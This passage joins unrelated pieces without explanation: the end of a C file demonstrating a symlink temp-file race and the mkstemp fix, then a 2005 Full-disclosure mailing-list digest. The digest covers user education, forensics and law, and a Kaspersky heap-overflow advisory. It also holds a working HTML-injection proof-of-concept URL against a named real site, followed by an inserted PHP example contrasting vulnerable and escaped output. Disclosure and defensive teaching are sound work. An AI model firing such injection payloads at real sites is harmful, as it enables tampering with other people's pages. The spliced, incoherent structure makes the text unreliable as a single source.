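    int fd = open(path, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, 0600);
    if (fd < 0)
        return -1;
    ssize_t n = write(fd, data, strlen(data));
    close(fd);
    return n == (ssize_t)strlen(data) ? 0 : -1;
}

/* Read back a short file into buf (helper for the demonstration). */
static int read_small(const char *path, char *buf, size_t len)
{
    FILE *fp = fopen(path, "r");
    if (fp == NULL)
        return -1;
    size_t n = fread(buf, 1, len - 1, fp);
    fclose(fp);
    buf[n] = '\0';
    return 0;
}

/* Reproduce the advisory scenario inside a scratch directory constructed for
 * this example (no real target): a "victim" file plus a symlink at the
 * predictable temp path pointing at it. Returns 1 when the predictable open
 * clobbered the victim while the exclusive open refused and left it intact,
 * 0 if either half behaved differently, -1 on setup failure. */
int demo_planted_symlink(void)
{
    char dir[] = "/tmp/tmpfile-demo.XXXXXX";
    char victim[256], planted[256], got[64];
    int rc = -1;

    if (mkdtemp(dir) == NULL)
        return -1;
    snprintf(victim, sizeof victim, "%s/victim.txt", dir);
    snprintf(planted, sizeof planted, "%s/predictable.tmp", dir);

    if (write_temp_exclusive(victim, "original") == 0 &&
        symlink(victim, planted) == 0) {
        /* Naive open: follows the planted link and overwrites the victim. */
        int clobbered = write_temp_predictable(planted, "clobbered") == 0 &&
                        read_small(victim, got, sizeof got) == 0 &&
                        strcmp(got, "clobbered") == 0;

        /* Restore the victim, then retry through the hardened open. */
        unlink(victim);
        int refused = write_temp_exclusive(victim, "original") == 0 &&
                      write_temp_exclusive(planted, "clobbered") == -1 &&
                      errno == EEXIST &&
                      read_small(victim, got, sizeof got) == 0 &&
                      strcmp(got, "original") == 0;

        rc = (clobbered && refused) ? 1 : 0;
    }
    unlink(planted);
    unlink(victim);
    rmdir(dir);
    return rc;
}

/* The usual fix in practice is mkstemp(): it chooses an unpredictable name
 * and performs the exclusive create itself. Returns 1 when the result is a
 * regular file (not a symlink), private (0600), and two calls never collide. */
int demo_mkstemp_private(void)
{
    char a[] = "/tmp/tmpfile-demo.XXXXXX", b[] = "/tmp/tmpfile-demo.XXXXXX";
    int fa = mkstemp(a), fb = mkstemp(b);
    struct stat st;
    int ok = fa >= 0 && fb >= 0 && strcmp(a, b) != 0 &&
             lstat(a, &st) == 0 && S_ISREG(st.st_mode) &&
             (st.st_mode & 0777) == 0600;
    if (fa >= 0) { close(fa); unlink(a); }
    if (fb >= 0) { close(fb); unlink(b); }
    return ok;
}
```

The same O_EXCL check is why "make test" targets and shell scripts that write to fixed /tmp names should be switched to mktemp(1) or mkstemp(3) rather than merely given less obvious filenames.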

RE: [Full-disclosure] Different Claims by ZoneLabs on the "Bypassing PersonalFirewall (Zone Alarm Pro) Using DDE-IPC" issue

2005-10-03 Thread Paul Laudanski
On Mon, 3 Oct 2005, Debasis Mohanty wrote:

> Paul, 
> 
> >> This does not include the version 3.7.159 you are testing.  
> 
> Didn't get what you mean by "This does not include". Do you
> mean whether or not version 3.7.159 is vulnerable it shouldn't be
> considered??

What I'm saying is that the vendor never claimed ZAP versions prior to 5 
are not vulnerable in the report.  So your comment is redundant.  Simply 
upgrade your version.  Ciao.

-- 
Paul Laudanski, Microsoft MVP Windows-Security
CastleCops(SM), http://castlecops.com



Re: [Full-disclosure] Careless Law Enforcement Computer ForensicsLacking InfoSec Expertise Causes Suicides

2005-10-03 Thread Michael Holstein

> The stash was in the bushes outside the residence. The kid and anyone
> else passing by had access to it. Reasonable doubt of ownership exists.


Reasonable doubt costs money.

~Mike.


Re: [Full-disclosure] Bigger burger roll needed

2005-10-03 Thread Micheal Espinola Jr
While it's easy to recognize your point, it's also quite moot.

The supportability issues of long ago are just that - long ago.  The
customer base was, when the PC market first expanded, and continues to
be, vastly larger than when computer companies offered that type of
service.  ...and at a much heftier price, I might add.

Let's not forget that back in the day, hardware and software
combinations were a tightly controlled package deal.  The PC market
expansion changed that forever, and the multitude of hardware/software
combinations have long since made the support you are longing for an
impossibility to maintain.

However, those of us that have discovered significant flaws in the MS
OS over the years know that MS takes bugs and flaws very seriously. 
Over the course of the past 10 years, I have had MS supply me with a
patch, within hours of a bug report, on many occasions.

This type of service certainly can't be expected or applied to all
types of errors and circumstance, many of which strongly depend on
unlucky combinations of hardware and 3rd-party drivers.

FWIW IME, most users know what a BSOD looks like (a "blue screen"),
but don't know it by that acronym.

On 10/3/05, [EMAIL PROTECTED] <[EMAIL PROTECTED]> wrote:
>
> One acronym: BSOD.  Why have users learned what it is, and grown accepting of
> seeing one?  Do you know any Windows users who have *never* encountered one?
> How many Windows users would believe that before Microsoft, vendors actually
> would take a *single* crash reported by *one* user seriously enough to
> investigate and produce a bugfix, and that vendors would escalate to the point
> of sending developers to the customer site if a system crashed multiple times
> and no fix was in sight in a week?
>
> For all its monopolistic abuses, the single worst thing Microsoft has done
> for the computer industry is lowered user expectations regarding software.

--
ME2  


[Full-disclosure] Kaspersky Antivirus Library Remote Heap Overflow

2005-10-03 Thread list
Date
October 3, 2005

Vulnerability
The Kaspersky Antivirus Library provides file format support for virus 
analysis. During analysis of cab files Kaspersky is vulnerable to a heap 
overflow allowing attackers complete control of the system(s) being protected. 
This vulnerability can be exploited remotely without user interaction in 
default configurations through common protocols such as SMTP, SMB, HTTP, and 
FTP.

Impact
Successful exploitation of Kaspersky protected systems allows attackers 
unauthorized control of data and related privileges. It also provides leverage 
for further network compromise. Kaspersky Antivirus Library implementations are 
likely vulnerable in their default configuration.

Affected Products
Due to the library’s OS-independent design and core functionality, it is likely 
this vulnerability affects a substantial portion of Kaspersky’s gateway, 
server, and client antivirus-enabled product lines on most platforms.

http://www.kaspersky.com/products

Note: Kaspersky’s antivirus OEM product line is a program where vendors may 
license the vulnerable library. The following link is a list containing some of 
the Kaspersky partners with products also likely affected by this 
vulnerability. Refer to your vendor for specifics.

http://www.kaspersky.com/oemsuccess

Credit
This vulnerability was discovered and researched by Alex Wheeler.

Contact
[EMAIL PROTECTED]

Advisory Details
http://www.rem0te.com/public/images/kaspersky.pdf




Re: [Full-disclosure] Bigger burger roll needed

2005-10-03 Thread Steve Friedl
On Mon, Oct 03, 2005 at 08:50:27AM -0400, [EMAIL PROTECTED] wrote:
> One acronym: BSOD.  Why have users learned what it is, and grown accepting of
> seeing one?  Do you know any Windows users who have *never* encountered one?

The majority of BSODs are caused by buggy third-party drivers and malware
(rootkits, etc.) Is that part of "Microsoft's monopolistic abuse"?

> How many Windows users would believe that before Microsoft, vendors actually
> would take a *single* crash reported by *one* user seriously enough to
> investigate and produce a bugfix, and that vendors would escalate to the point
> of sending developers to the customer site if a system crashed multiple times
> and no fix was in sight in a week?

Before Microsoft, you got your hardware and OS from the same vendor, so
there was a much larger revenue stream to support that kind of service.
When you pay $100-ish (OEM) for your operating system, it's not so clear
that anybody really ought to expect Bill to get in the car and swing by
on his way home.

Steve

--- 
Stephen J Friedl | Security Consultant |  UNIX Wizard  |   +1 714 544-6561
www.unixwiz.net  | Tustin, Calif. USA  | Microsoft MVP | [EMAIL PROTECTED]


RE: [Full-disclosure] Careless Law Enforcement Computer Forensics Lacking InfoSec Expertise Causes Suicides

2005-10-03 Thread Lane Weast
In theory, what you say is incorrect.

They may take you in, but in court they have to prove it was yours.
It is not your responsibility to prove your innocence.
It is their responsibility to prove your guilt.

In fact, there are more than a couple of cases where the prosecutor told
the jury the defense's job was to prove the defendant innocent of the
charges, which shortly thereafter resulted in a mistrial.

The defense's job is to call into question the evidence used to attempt
to prove guilt, thereby providing reasonable doubt.

The stash was in the bushes outside the residence. The kid and anyone
else passing by had access to it. Reasonable doubt of ownership exists.

In my opinion there is a big difference.
Additionally, there exists "Jury Nullification"; most prosecutors
will dismiss you from jury duty if you say you are aware of its
existence.

Def: The jury has a responsibility to vote their conscience. If the law
is unjust, the jury has the right to refuse to convict. Without this,
there is no need for a jury to act as a balance to the law.

Lane

-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of Michael
Holstein
Sent: Monday, October 03, 2005 9:17 AM
To: Full-Disclosure
Subject: Re: [Full-disclosure] Careless Law Enforcement Computer
Forensics Lacking InfoSec Expertise Causes Suicides


> As long as the possession itself is a crime, this is just a waste of 
> resources.  I tend to agree that the current situation in most 
> countries is difficult because of the elusive nature of purely 
> electronic evidence.

Old problem, new kind of evidence .. if someone were to stash their dope
in my bushes while running from the cops, and that's later discovered by
my neighbor's kid .. guess who's going to end up down at the station
looking stupid? .. ME.

Possession is 9/10 of the law. Once you've got dirt on your hands, it's
your responsibility to prove it isn't yours. Unfortunately, in the
digital world, that means you've got to be able to afford an expert to
rebut the techie on the prosecution's payroll.

Curiously, here in Ohio, we have a law that says (in part) that the
police must *prove* that any digital kiddie porn is a "real" kid, and
not an image altered to look like one. Wrong or right, that little
loophole has acquitted several defendants that have the means to hire an
expert witness.

Michael Holstein CISSP GCIA
Cleveland State University


Re: [Full-disclosure] Careless Law Enforcement Computer Forensics Lacking InfoSec Expertise Causes Suicides

2005-10-03 Thread Michael Holstein

> As long as the possession itself is a crime, this is just a waste of
> resources.  I tend to agree that the current situation in most
> countries is difficult because of the elusive nature of purely
> electronic evidence.

Old problem, new kind of evidence .. if someone were to stash their dope
in my bushes while running from the cops, and that's later discovered by
my neighbor's kid .. guess who's going to end up down at the station
looking stupid? .. ME.

Possession is 9/10 of the law. Once you've got dirt on your hands, it's
your responsibility to prove it isn't yours. Unfortunately, in the
digital world, that means you've got to be able to afford an expert to
rebut the techie on the prosecution's payroll.

Curiously, here in Ohio, we have a law that says (in part) that the
police must *prove* that any digital kiddie porn is a "real" kid, and
not an image altered to look like one. Wrong or right, that little
loophole has acquitted several defendants that have the means to hire an
expert witness.


Michael Holstein CISSP GCIA
Cleveland State University


Re: [Full-disclosure] Bigger burger roll needed

2005-10-03 Thread Valdis . Kletnieks
On Mon, 03 Oct 2005 07:49:33 EDT, "J. Oquendo" said:
> 
> On Mon, 3 Oct 2005, Randall M wrote:
> > is a known fact that the major cause of computer criminal acts is the result
> > of careless and uneducated users. I have said it again and again, the "User"
> > is the best defense any Admin can have.

> by someone who didn't have a clue. The user is the biggest security risk
> and THAT is a known and published fact, not vice versa.

Umm.. That's exactly what Randall said - *security-unclued* users are the
biggest risk, and the sysadmin's best defense is having trained and clued
users.




Re: [Full-disclosure] Bigger burger roll needed

2005-10-03 Thread Valdis . Kletnieks
On Mon, 03 Oct 2005 07:49:33 EDT, "J. Oquendo" said:
> 
> On Mon, 3 Oct 2005, Randall M wrote:
> 
> > Virus Friendly and phased might be too young to remember the old saying "what
> > you want the next generation to believe begin teaching this generation". It
> 
> That's a nicely worded brainwashing statement. How about having the next
> generation believe truth not what you want them to believe. Do you by
> chance work for Cisco or Microsoft "They're not really vulnerabilities
> believe me..."

One acronym: BSOD.  Why have users learned what it is, and grown accepting of
seeing one?  Do you know any Windows users who have *never* encountered one?
How many Windows users would believe that before Microsoft, vendors actually
would take a *single* crash reported by *one* user seriously enough to
investigate and produce a bugfix, and that vendors would escalate to the point
of sending developers to the customer site if a system crashed multiple times
and no fix was in sight in a week?

For all its monopolistic abuses, the single worst thing Microsoft has done
for the computer industry is lowered user expectations regarding software.




RE: [Full-disclosure] Bigger burger roll needed

2005-10-03 Thread J. Oquendo

On Mon, 3 Oct 2005, Randall M wrote:

> Virus Friendly and phased might be too young to remember the old saying "what
> you want the next generation to believe begin teaching this generation". It

That's a nicely worded brainwashing statement. How about having the next
generation believe truth not what you want them to believe. Do you by
chance work for Cisco or Microsoft "They're not really vulnerabilities
believe me..."

> is a known fact that the major cause of computer criminal acts is the result
> of careless and uneducated users. I have said it again and again, the "User"
> is the best defense any Admin can have.

How is this a known fact rather than an ASSumption? Facts speak louder
than words so rather than repeat what others have... well repeated some
nice facts pointed out would have been nice. From my inference on your
comment, that would mean every "major" malicious hack ever done was done
by someone who didn't have a clue. The user is the biggest security risk
and THAT is a known and published fact, not vice versa.

> If she or he understands the dangers they will not click the tempting
> link or download the pretty card. And if  they take what they have
> learned home with them they diminish the Botnet army. As far as "16 year
> olds can pass the CISSP exam" statement, that's a dam educated user.

Could they diminish any botnet army? I'm thinking in tunes of 16 year old
with hormones out of control, acting up out of rebellion and I'm wondering
if the mental capacity is fully there to not spread malice if they had the
mental capacity to cause malice electronically.

I picture some frustrated 16 year old using a botnet to take out his
school because someone bullied him, because his little girlfriend left him
so he decides to socially engineer some crap on his machine. I'm picturing
a 16 year old with misguided "morals" "nuking" a country's infrastructure
because his brain is filled with crapaganda.

As for the "dam educated user" statement, not to discount the studies
involved and passions possessed by those with certs, but quite frankly
those (certs) mean little to me considering I've seen those with
signatures the size of San Francisco have a clue the size of a flea. I
agree and disagree. On a side note I'm wondering what the ISC will
begin doing in about a decade considering the statistics nowadays:
"Growing at a rate of about 900 inmates each week between mid-2003 and
mid-2004, the nation's prisons and jails held 2.1 million people, or one
in every 138 U.S. residents" [http://tinyurl.com/dwplj] Perhaps abolish
their "guidelines".


=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
J. Oquendo
GPG Key ID 0x97B43D89
http://pgp.mit.edu:11371/pks/lookup?op=get&search=0x97B43D89

"Every man builds his world in his own image. He has the
power to choose, but no power to escape the necessity of
choice." -- Ayn Rand


RE: [Full-disclosure] Bigger burger roll needed

2005-10-03 Thread Randall M
Virus Friendly and phased might be too young to remember the old saying "what
you want the next generation to believe begin teaching this generation". It
is a known fact that the major cause of computer criminal acts is the result
of careless and uneducated users. I have said it again and again, the "User"
is the best defense any Admin can have. If she or he understands the dangers
they will not click the tempting link or download the pretty card. And if
they take what they have learned home with them they diminish the Botnet
army. As far as "16 year olds can pass the CISSP exam" statement, that's a
dam educated user.

Thank You
Randall M

=

"You too can have your very own Computer!"

Note: Side effects include: 
Blue screens; interrupt violation;
illegal operations; remote code
exploitations; virus and malware infestations;
and other unknown vulnerabilities.

 

-Original Message-
From: [EMAIL PROTECTED] 
[mailto:[EMAIL PROTECTED] On 
Behalf Of phased
Sent: Monday, October 03, 2005 5:26 AM
To: full-disclosure@lists.grok.org.uk
Subject: Re[2]: [Full-disclosure] Bigger burger roll needed

"Put information in front of the user, on unrelated pages.
Keep doing it and eventually users will be educated on a
reasonable level to better check and patch systems, before
the authors of malicious code and script kids get to them
first." n3td3v

No, your receptionist really couldn't give a shit, they have
enough to do without reading security advisories spammed to
them every day.  What you would find is that they will
probably learn more about adding a spam filter than
securing their PC.  Educating end users on risk is good,
but you can't expect them to patch their own systems
especially when someone else is being paid to, or do you
want to be out of a job? :)

-Original Message-
From: Virus Friendly <[EMAIL PROTECTED]>
To: n3td3v <[EMAIL PROTECTED]>
Date: Mon, 3 Oct 2005 04:47:09 -0400
Subject: Re: [Full-disclosure] Bigger burger roll needed

> I like how security professionals see themselves as part of the
> intellectual elite and the "computer users" as the ignorant hordes.
> In a field where anyone is called an "expert", and 16 year olds can pass
> a CISSP, how is it that these "experts" forget they are only a
> certification away from being clueless.
> 
>  On 10/1/05, n3td3v <[EMAIL PROTECTED]> wrote:
> >
> > Hello to security community,
> >
> > n3td3v thought you might like to be alerted to his latest internet
> > posting on corporate security and the relation between corporations,
> > the consumer. and computer security.
> >
> > Details:
> >
> > http://news.com.com/5208-12-0.html?forumID=1&threadID=10054&messageID=72865&start=-196
> >
> > Yours truly,
> >
> > n3td3v
> >
> 


[Full-disclosure] (no subject)

2005-10-03 Thread shell
On the site tanfoglio.it, there is a small php script that provides a small
popup with a picture of their product. The vulnerability lies in the fact that
this script fails to sanitize input. This can allow a user to put arbitrary
code into the file.

POC:
http://www.tanfoglio.it/popup1.php?foto=%22%3E%3Cimg%20src=http://www.google.com/images/logo.gif%3E

If there are any sites with similar scripts, please inform me.

- Shell ([EMAIL PROTECTED])
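As an added example (not tanfoglio.it's popup1.php, which is not on the page), a stand-in PHP popup script showing the unescaped-attribute pattern the post describes beside an output-encoded and an allowlisted version, each run on the decoded value from the PoC URL; the image file names and the fallback image are assumptions.

```php
<?php
// Added example, not the site's script: a minimal stand-in for a popup
// page that takes an image name from ?foto= and writes it into an <img>
// tag, reproducing only the bug class the post describes.

// Vulnerable pattern: the raw parameter is concatenated into markup.
// A value beginning with '">' closes the src attribute and the tag, so
// the rest of the value is parsed by the browser as new HTML.
function render_unsafe(string $foto): string
{
    return '<img src="' . $foto . '">';
}

// Output encoding only: htmlspecialchars() with ENT_QUOTES turns the
// quote and angle brackets into entities, so no attribute breakout occurs.
function render_escaped(string $foto): string
{
    $escaped = htmlspecialchars($foto, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    return '<img src="' . $escaped . '">';
}

// Hardened pattern: allowlist the value as a bare image file name first
// (rejects "/", "..", quotes, angle brackets and absolute URLs), then
// encode for the attribute context anyway as defence in depth.
function render_safe(string $foto): string
{
    if (!preg_match('/\A[A-Za-z0-9_-]+\.(?:jpe?g|png|gif)\z/i', $foto)) {
        $foto = 'default.jpg';  // hypothetical fallback image
    }
    return render_escaped($foto);
}

// Stand-alone demo using the query value from the post's PoC URL
// (decodes to: "><img src=http://www.google.com/images/logo.gif>).
$foto = urldecode('%22%3E%3Cimg%20src=http://www.google.com/images/logo.gif%3E');
echo "unsafe:  " . render_unsafe($foto) . "\n";   // a second <img> tag appears
echo "escaped: " . render_escaped($foto) . "\n";  // value stays inside src=""
echo "safe:    " . render_safe($foto) . "\n";     // falls back to default.jpg
echo "legit:   " . render_safe('pistol1.jpg') . "\n";  // constructed valid name
```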


Re[2]: [Full-disclosure] Bigger burger roll needed

2005-10-03 Thread phased
"Put information in front of the user, on unrelated pages. Keep doing it and 
eventually users will be educated on a reasonable level to better check and patch 
systems, before the authors of malicious code and script kids get to them 
first." n3td3v

No, your receptionist really couldn't give a shit, they have enough to do without
reading security advisories spammed to them every day.  What you would find is
that they will probably learn more about adding a spam filter than securing
their PC.  Educating end users on risk is good, but you can't expect them to
patch their own systems especially when someone else is being paid to, or do
you want to be out of a job? :)

-Original Message-
From: Virus Friendly <[EMAIL PROTECTED]>
To: n3td3v <[EMAIL PROTECTED]>
Date: Mon, 3 Oct 2005 04:47:09 -0400
Subject: Re: [Full-disclosure] Bigger burger roll needed

> I like how security professionals see themselves as part of the intellectual
> elite and the "computer users" as the ignorant hordes.
> In a field where anyone is called an "expert", and 16 year olds can pass a
> CISSP, how is it that these "experts" forget they are only a certification
> away from being clueless.
> 
>  On 10/1/05, n3td3v <[EMAIL PROTECTED]> wrote:
> >
> > Hello to security community,
> >
> > n3td3v thought you might like to be alerted to his latest internet
> > posting on corporate security and the relation between corporations,
> > the consumer. and computer security.
> >
> > Details:
> >
> > http://news.com.com/5208-12-0.html?forumID=1&threadID=10054&messageID=72865&start=-196
> >
> > Yours truly,
> >
> > n3td3v
> >
> 


Re: [Full-disclosure] Bigger burger roll needed

2005-10-03 Thread Virus Friendly
I like how security professionals see themselves as part of the intellectual elite and the "computer users" as the ignorant hordes.
In a field where anyone is called an "expert", and 16 year olds can pass a CISSP, how is it that these "experts" forget they are only a certification away from being clueless.

On 10/1/05, n3td3v <[EMAIL PROTECTED]> wrote:
> Hello to security community,
>
> n3td3v thought you might like to be alerted to his latest internet
> posting on corporate security and the relation between corporations,
> the consumer. and computer security.
>
> Details:
>
> http://news.com.com/5208-12-0.html?forumID=1&threadID=10054&messageID=72865&start=-196
>
> Yours truly,
>
> n3td3v
